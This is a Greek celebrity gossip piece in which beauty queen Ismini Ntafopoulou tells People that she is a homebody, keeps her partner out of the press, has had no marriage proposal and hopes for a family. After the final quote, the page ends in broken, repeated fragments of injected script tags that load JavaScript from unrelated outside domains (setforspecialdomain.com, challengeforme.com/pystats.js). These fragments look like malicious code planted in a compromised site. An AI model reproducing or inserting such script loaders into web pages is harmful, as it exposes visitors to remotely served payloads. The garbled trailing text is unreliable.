Η Ισμήνη Νταφοπούλου είναι κορίτσι για σπίτι

Η Ισμήνη Νταφοπούλου είναι κορίτσι για σπίτι

Κορίτσι για σπίτι δηλώνει η Ισμήνη Νταφοπούλου η οποία και δεν αποκλείει σε λίγα χρόνια να έχει δημιουργήσει τη δική της οικογένεια.

«Δεν θα κλειστώ στο σπίτι μου, ούτε θέλω να κρύβομαι. Πρέπει όμως να σεβαστώ την επιθυμία κάποιου που δεν είναι το καλύτερό του να υπάρχει στα περιοδικά. Παρατηρώ ένα μάλλον αυξημένο ενδιαφέρον για τα προσωπικά μου, αλλά προσπαθώ να μην προκαλώ. Αν κάνεις την αρχή να μιλήσεις, μετά πρέπει συνέχεια να απαντάς. Δεν μου αρέσει, επειδή είμαι εγώ στα φώτα, να εκθέτω κάποιον που ίσως να μη θέλει» λέει στο People.

Όσο για τα δημοσιεύματα που την θέλουν να ανεβαίνει σύντομα τα σκαλιά της εκκλησίας, η πανέμορφη Σταρ Ελλάς απαντάει:

«Αυτό είναι κάτι που θα φανεί. Αν σχολιάσεις κάτι, ανοίγεις λογαριασμούς και μετά δημιουργείς μόνος σου το θέμα. Ακόμα και όταν ήμουν με κάποιον άνθρωπο πιο γνωστό από εμένα, προσπαθούσα να κρατάω χαμηλούς τόνους. Γιατί να δώσω λαβή για σχόλια; Δεν μου έχει γίνει πρόταση γάμου, πάντως, και είναι αστείο να μιλάω για θέματα που δεν έχουν βάση. Κατά τα άλλα, είμαι κορίτσι για σπίτι, είμαι “σχεσάκιας” και με φαντάζομαι σε λίγα χρόνια με οικογένεια και παιδιά. Μεγάλωσα σε δεμένη οικογένεια κι έχω έναν αδελφό, τον Δημήτρη, που τον λατρεύω».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >